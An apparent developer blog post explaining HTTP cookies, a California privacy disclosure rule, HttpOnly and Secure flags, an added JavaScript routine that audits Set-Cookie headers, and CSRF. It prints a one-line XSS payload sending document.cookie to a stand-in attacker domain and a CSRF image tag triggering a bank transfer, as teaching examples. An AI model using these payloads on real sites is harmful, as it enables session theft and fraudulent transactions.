Honestly, I was curious about the “cookie” prompt all the time, but I didn’t really care about it until I came across the California Internet Privacy Bill. Then I knew why I often saw these on all kinds of websites, but strangely, I have never seen this thing on Chinese websites. Maybe we don’t respect the privacy of others, haha. But it really enlightened me on the thoughts about privacy and the concerns about the security of cookies.
If any consumers of your web service are located in the state of California, you must:
- Explain “how you deal with” do-not-track requests.
- Make that information available in a conspicuous way from your homepage. (A text link to a privacy policy will do the trick)
Like this:
In case you don’t know:
An HTTP cookie is a small piece of data that a server sends to the user’s web browser. The browser may store it and send it back with the next request to the same server.
Cookies are mainly used for three purposes:
- Session management: logins, shopping carts, game scores, or anything else the server should remember
- Personalization: user preferences, themes, and other settings
- Tracking: recording and analyzing user behavior
Cookies are sent with every request, so they can worsen performance (especially over mobile data connections). For storing data on the client, the modern Web Storage API (localStorage and sessionStorage) and IndexedDB are recommended instead.
Setting cookies: the server includes one Set-Cookie header per cookie in its response:
HTTP/1.0 200 OK
Content-type: text/html
Set-Cookie: yummy_cookie=choco
Set-Cookie: tasty_cookie=strawberry
...
Now, with every new request to the server, all previously stored cookies are sent to the server using the Cookie header.
GET /sample_page.html HTTP/1.1
Host: www.example.org
Cookie: yummy_cookie=choco; tasty_cookie=strawberry
Security
HttpOnly
To limit the damage of cross-site scripting (XSS) attacks, cookies marked HttpOnly are inaccessible to JavaScript’s Document.cookie API. Instead, they are only sent to the server.
An example of exploiting an XSS vulnerability to steal cookies:
(new Image()).src = "http://www.evil-domain.com/steal-cookie.php?cookie=" + document.cookie;
The HttpOnly cookie attribute can help by preventing access to the cookie value through JavaScript.
Secure
A Secure cookie is only sent to the server with an encrypted request over the HTTPS protocol. Even with Secure, sensitive information should never be stored in cookies, as they are inherently insecure and this flag can’t offer real protection.
So, we are supposed to set cookies like this:
Set-Cookie: id=a3fWa; Expires=Wed, 21 Oct 2015 07:28:00 GMT; Secure; HttpOnly
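The Set-Cookie/Cookie exchange above and the recommended Secure; HttpOnly line are easy to get subtly wrong in practice, so here is an added example (my own code, not from the original post or from any library) that parses both headers, audits a Set-Cookie line for the protective attributes, and builds one correctly. It also checks for SameSite, which the post does not mention but which the same audit would normally include; the parsing is plain string handling with no assumptions about a particular framework.

```javascript
// Added example (not from the original post): parse and audit Set-Cookie and
// Cookie headers the way a response/request linter would.

// Parse one Set-Cookie header value into { name, value, attributes }.
// Attribute names are lower-cased; flag attributes (Secure, HttpOnly) become true.
function parseSetCookie(header) {
  const parts = header.split(';').map((p) => p.trim()).filter(Boolean);
  const eq = parts[0] ? parts[0].indexOf('=') : -1;
  if (eq < 0) throw new Error('Set-Cookie must start with name=value');
  const cookie = {
    name: parts[0].slice(0, eq).trim(),
    value: parts[0].slice(eq + 1).trim(),
    attributes: {},
  };
  for (const attr of parts.slice(1)) {
    const i = attr.indexOf('=');
    const key = (i < 0 ? attr : attr.slice(0, i)).trim().toLowerCase();
    cookie.attributes[key] = i < 0 ? true : attr.slice(i + 1).trim();
  }
  return cookie;
}

// Parse the request-side Cookie header ("a=1; b=2") into a plain object.
function parseCookieHeader(header) {
  const out = {};
  for (const pair of header.split(';')) {
    const trimmed = pair.trim();
    if (!trimmed) continue;
    const eq = trimmed.indexOf('=');
    if (eq < 0) continue; // malformed pair: skip it rather than guess
    out[trimmed.slice(0, eq).trim()] = trimmed.slice(eq + 1).trim();
  }
  return out;
}

// Report which protective attributes a Set-Cookie line is missing.
// Returns [] when the cookie carries Secure, HttpOnly and a SameSite value.
function auditSetCookie(header) {
  const { attributes } = parseSetCookie(header);
  const findings = [];
  if (!attributes.secure) findings.push('missing Secure: cookie is also sent over plain HTTP');
  if (!attributes.httponly) findings.push('missing HttpOnly: readable via document.cookie');
  if (!attributes.samesite) findings.push('missing SameSite: browser default applies');
  return findings;
}

// Build a Set-Cookie value with the protective attributes applied.
// `expires` is a Date; SameSite defaults to Lax, which suits session cookies.
function buildSetCookie(name, value, { expires, sameSite = 'Lax' } = {}) {
  const parts = [`${name}=${value}`];
  if (expires) parts.push(`Expires=${expires.toUTCString()}`);
  parts.push('Secure', 'HttpOnly', `SameSite=${sameSite}`);
  return parts.join('; ');
}

// Usage: audit the two cookies from the response shown earlier in the post.
for (const line of ['yummy_cookie=choco', 'id=a3fWa; Expires=Wed, 21 Oct 2015 07:28:00 GMT; Secure; HttpOnly']) {
  console.log(line, '->', auditSetCookie(line));
}
```

Running the audit over the headers from earlier in the post shows the difference: yummy_cookie=choco has no protection at all, while the id cookie only lacks SameSite. A check like this fits naturally into an integration test that inspects every Set-Cookie header a service emits.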
Cross-site request forgery (CSRF)
There is a good example on Wikipedia explaining what CSRF is.
Suppose someone gets you to load a page containing an image tag like this:
<img src="http://bank.example.com/withdraw?account=bob&amount=1000000&for=mallory">
If you are logged into your bank account and your cookies are still valid (and there is no other validation), you will transfer money as soon as you load the HTML that contains this image!
There are a few techniques that are used to prevent this from happening:
- input filtering
- confirmation required for any sensitive action
- short lifetime of cookies for sensitive actions
For more prevention tips, see the OWASP CSRF prevention cheat sheet.